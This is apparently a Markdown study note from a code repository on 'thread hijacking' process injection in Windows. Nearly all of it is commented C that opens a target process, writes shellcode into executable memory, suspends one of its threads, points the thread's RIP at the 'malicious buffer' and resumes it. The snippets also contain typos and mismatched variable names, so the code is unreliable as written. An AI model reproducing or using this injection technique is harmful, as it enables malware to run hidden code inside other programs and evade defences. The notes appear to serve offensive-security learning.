80 lines
2.2 KiB
Markdown
80 lines
2.2 KiB
Markdown
# Thread Hijacking
|
|
|
|
* Open process, allocate and write memory
|
|
```c
|
|
HANDLE hProcess = OpenProcess(
|
|
PROCESS_ALL_ACCESS, // Requests all possible access rights
|
|
FALSE, // Child processes do not inheret parent process handle
|
|
processId // Stored process ID
|
|
);
|
|
PVOIF remoteBuffer = VirtualAllocEx(
|
|
hProcess, // Opened target process
|
|
NULL,
|
|
sizeof shellcode, // Region size of memory allocation
|
|
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
|
|
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
|
|
);
|
|
WriteProcessMemory(
|
|
processHandle, // Opened target process
|
|
remoteBuffer, // Allocated memory region
|
|
shellcode, // Data to write
|
|
sizeof shellcode, // byte size of data
|
|
NULL
|
|
);
|
|
```
|
|
|
|
* Snapshot the process and get the first thread
|
|
```c
|
|
THREADENTRY32 threadEntry;
|
|
|
|
HANDLE hSnapshot = CreateToolhelp32Snapshot( // Snapshot the specificed process
|
|
TH32CS_SNAPTHREAD, // Include all processes residing on the system
|
|
0 // Indicates the current process
|
|
);
|
|
Thread32First( // Obtains the first thread in the snapshot
|
|
hSnapshot, // Handle of the snapshot
|
|
&threadEntry // Pointer to the THREADENTRY32 structure
|
|
);
|
|
|
|
while (Thread32Next( // Obtains the next thread in the snapshot
|
|
snapshot, // Handle of the snapshot
|
|
&threadEntry // Pointer to the THREADENTRY32 structure
|
|
)) {
|
|
```
|
|
|
|
* Get Pointer to the thread
|
|
```c
|
|
if (threadEntry.th32OwnerProcessID == processID) // Verifies both parent process ID's match
|
|
{
|
|
HANDLE hThread = OpenThread(
|
|
THREAD_ALL_ACCESS, // Requests all possible access rights
|
|
FALSE, // Child threads do not inheret parent thread handle
|
|
threadEntry.th32ThreadID // Reads the thread ID from the THREADENTRY32 structure pointer
|
|
);
|
|
break;
|
|
}
|
|
```
|
|
|
|
* Suspend threat ,get context and change `$rip`
|
|
```
|
|
SuspendThread(hThread);
|
|
CONTEXT context;
|
|
GetThreadContext(
|
|
hThread, // Handle for the thread
|
|
&context // Pointer to store the context structure
|
|
);
|
|
context.Rip = (DWORD_PTR)remoteBuffer; // Points RIP to our malicious buffer allocation
|
|
```
|
|
|
|
* Set context and resume the thread
|
|
```c
|
|
SetThreadContext(
|
|
hThread, // Handle for the thread
|
|
&context // Pointer to the context structure
|
|
);
|
|
ResumeThread(
|
|
hThread // Handle for the thread
|
|
);
|
|
```
|
|
|